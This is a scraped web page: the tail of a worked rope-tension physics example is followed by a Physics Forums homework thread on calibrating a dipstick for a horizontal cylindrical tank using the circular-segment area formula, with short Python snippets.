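m_t = 55.0    # kg, Trusty Sidekick

F_tb = m_t * g            # tension in the bottom rope: supports only the sidekick
F_tt = (m_s + m_t) * g    # tension in the top rope: supports both

print(round(F_tt, 1), round(F_tb, 1))
```

This gives about 1421 N and 539 N, i.e., 1420 N and 539 N to three significant figures, matching the answers above.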
This is 9.80 here. So that answers part B, and then part C says, what is the force of tension in the bottom portion of rope? And we already said here in equation two version b that it’s the weight of the trusty sidekick. So calculate that weight by taking 55 kilograms times 9.8 newtons per kilogram, which is 539 newtons. | 2020-07-14 04:34:22 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.6649565696716309, "perplexity": 576.7518695784163}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.3, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2020-29/segments/1593657147917.99/warc/CC-MAIN-20200714020904-20200714050904-00049.warc.gz"} |
http://www.physicsforums.com/showthread.php?p=3135200 | # Simple dipstick problem
by pat666
Tags: dipstick, simple
HW Helper
P: 3,326
Quote by pat666 I think it is correct but given the amount of trouble I've had getting the solution you can see why I am unsure.
Yes it's correct. I was just showing you that you can tidy up
Quote by pat666 $$V_{\text{fluid}}=\frac{\pi\left(\frac{h}{H}R\right)^2 h}{3}$$ probably simplify down further.
into
Quote by Mentallic Sure, $$V=\frac{\pi h^3R}{3H^2}$$
Quote by pat666 just the way the picture was drawn made me think r=h,
Oh, yeah that would be my fault, sorry
Quote by pat666 which would be true if the water was at the centre.
The blue line was meant to be where the water level was at.
Quote by pat666 I get that $$\theta=2\cos^{-1}\left(\frac{r-h}{r}\right)$$
Yes that's right.
Quote by pat666 not sure if thats correct because you gave me some trig info that was a bit more complex.
My trig info was wrong, ignore it. I forgot about the 2 that was going to be in front of it. What I was meant to give you was
$$\sin\left(2\cos^{-1}\left(x\right)\right)=2x\sqrt{1-x^2}$$
It may look complex, but its purpose is simple. When you plug $\theta$ into the area equation $$A=\frac{r^2}{2}\left(\theta-\sin\theta\right)$$ you're going to be left with
edit: $$\sin\left(2\cos^{-1}\left(\frac{r-h}{r}\right)\right)$$ which is where you can simplify this with the equality I gave above.
You already have the answer, but it's just if you wanted to simplify things a bit more.
Markers wouldn't give full marks if you left an answer as $$\sin\left(\sin^{-1}\left(x\right)\right)$$ so I doubt they would give full marks if you left it as $$\sin\left(\cos^{-1}\left(x\right)\right)$$ either.
Quote by pat666 also this will only work to the halfway point but I was thinking I would just do the reflection of the earlier dipstick points for points after the mid line. thanks
I believe the same formula will work for the water level anywhere from 0 to 2r (the diameter of the circle) but I'll check to see.
P: 709 Ok, thanks a lot for all your help
PF Patron P: 1,300 The cylinder on its side problem reduces to y = x - sin(x) in its simplest form. If you can solve for x, then you can solve the problem. There is a reason they put this problem in computer science textbooks and never in mathematics textbooks.
HW Helper
P: 3,326
Quote by pat666 Ok, thanks a lot for all your help
No worries
Quote by OmCheeto The cylinder on its side problem reduces to y = x - sin(x) in its simplest form. If you can solve for x, then you can solve the problem.
Quote by OmCheeto There is a reason they put this problem in computer science textbooks and never in mathematics textbooks.
I've seen questions similar to this in maths books.
P: 709 This question is for yr 11 math. My solution is I believe $$V=L*\sin\left(\cos^{-1}\left(2\cdot\frac{r-h}{r}\right)\right)$$.
HW Helper
P: 3,326
Quote by pat666 This question is for yr 11 math. My solution is I believe $$V=L*\sin\left(\cos^{-1}\left(2\cdot\frac{r-h}{r}\right)\right)$$.
That's not right. The formula is $$A=\frac{r^2}{2}\left(\theta-\sin\theta\right)$$ where $$\theta=2\cos^{-1}\left(\frac{r-h}{r}\right)$$
P: 709 whoops, I forgot the first theta, so $$V=L\cdot\frac{r^2}{2}\left(2\cos^{-1}\left(\frac{r-h}{r}\right)-\sin\left(2\cos^{-1}\left(\frac{r-h}{r}\right)\right)\right)$$ pretty messy.
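The circular-segment formula discussed in the thread is easy to turn into a function (a sketch of my own, not posted in the thread; it uses the same $A=\frac{r^2}{2}(\theta-\sin\theta)$, $\theta=2\cos^{-1}\frac{r-h}{r}$ relations):

```python
from math import acos, sin

def partial_cylinder_volume(r, L, h):
    """Liquid volume in a horizontal cylinder of radius r and length L,
    filled to depth h (0 <= h <= 2r), via the circular-segment area."""
    theta = 2.0 * acos((r - h) / r)            # central angle of the wet segment
    area = r**2 / 2.0 * (theta - sin(theta))   # A = r^2/2 (theta - sin theta)
    return L * area

# sanity checks: half full at h = r, completely full at h = 2r
print(partial_cylinder_volume(1.0, 1.0, 1.0))  # pi/2, half the unit cylinder
print(partial_cylinder_volume(1.0, 1.0, 2.0))  # pi, the full cylinder
```

The h = 2r case also bears out the claim earlier in the thread that the same formula covers levels past the midline, with no need to reflect the dipstick marks.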
PF Patron
P: 1,300
Quote by Mentallic Can you please elaborate?
Perhaps the question in the book was worded differently.
All I know is that if you have a 10 gallon tank, it is not possible to place integer gallon marks on the dipstick. Unless of course you are clever enough to solve for x.
And perhaps I should give some background regarding this particular problem before someone yells at me for playing mind games.
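OmCheeto's point is that placing the gallon marks requires inverting y = x - sin(x), which has no closed form. Since x - sin(x) is monotonic on [0, 2π], a bisection does the job; this sketch (my own naming, not from the thread) finds the dipstick depth for any filled fraction:

```python
from math import sin, cos, pi

def solve_theta(frac, tol=1e-12):
    """Solve theta - sin(theta) = 2*pi*frac on [0, 2*pi] by bisection.
    frac is the desired filled fraction of the tank's volume."""
    target = 2.0 * pi * frac
    lo, hi = 0.0, 2.0 * pi
    while hi - lo > tol:
        mid = 0.5 * (lo + hi)
        if mid - sin(mid) < target:
            lo = mid
        else:
            hi = mid
    return 0.5 * (lo + hi)

def mark_depth(frac, r):
    """Dipstick depth at which a horizontal cylindrical tank holds frac of its volume."""
    theta = solve_theta(frac)
    return r * (1.0 - cos(theta / 2.0))  # inverts theta = 2 arccos((r - h)/r)

# depths (in units of r) for integer-gallon marks on a "10 gallon" tank
marks = [mark_depth(k / 10.0, 1.0) for k in range(11)]
```

A half-full tank gives a mark at h = r and a full tank at h = 2r, as expected; the intermediate marks are the non-uniform spacings that make the problem a classic numerical exercise.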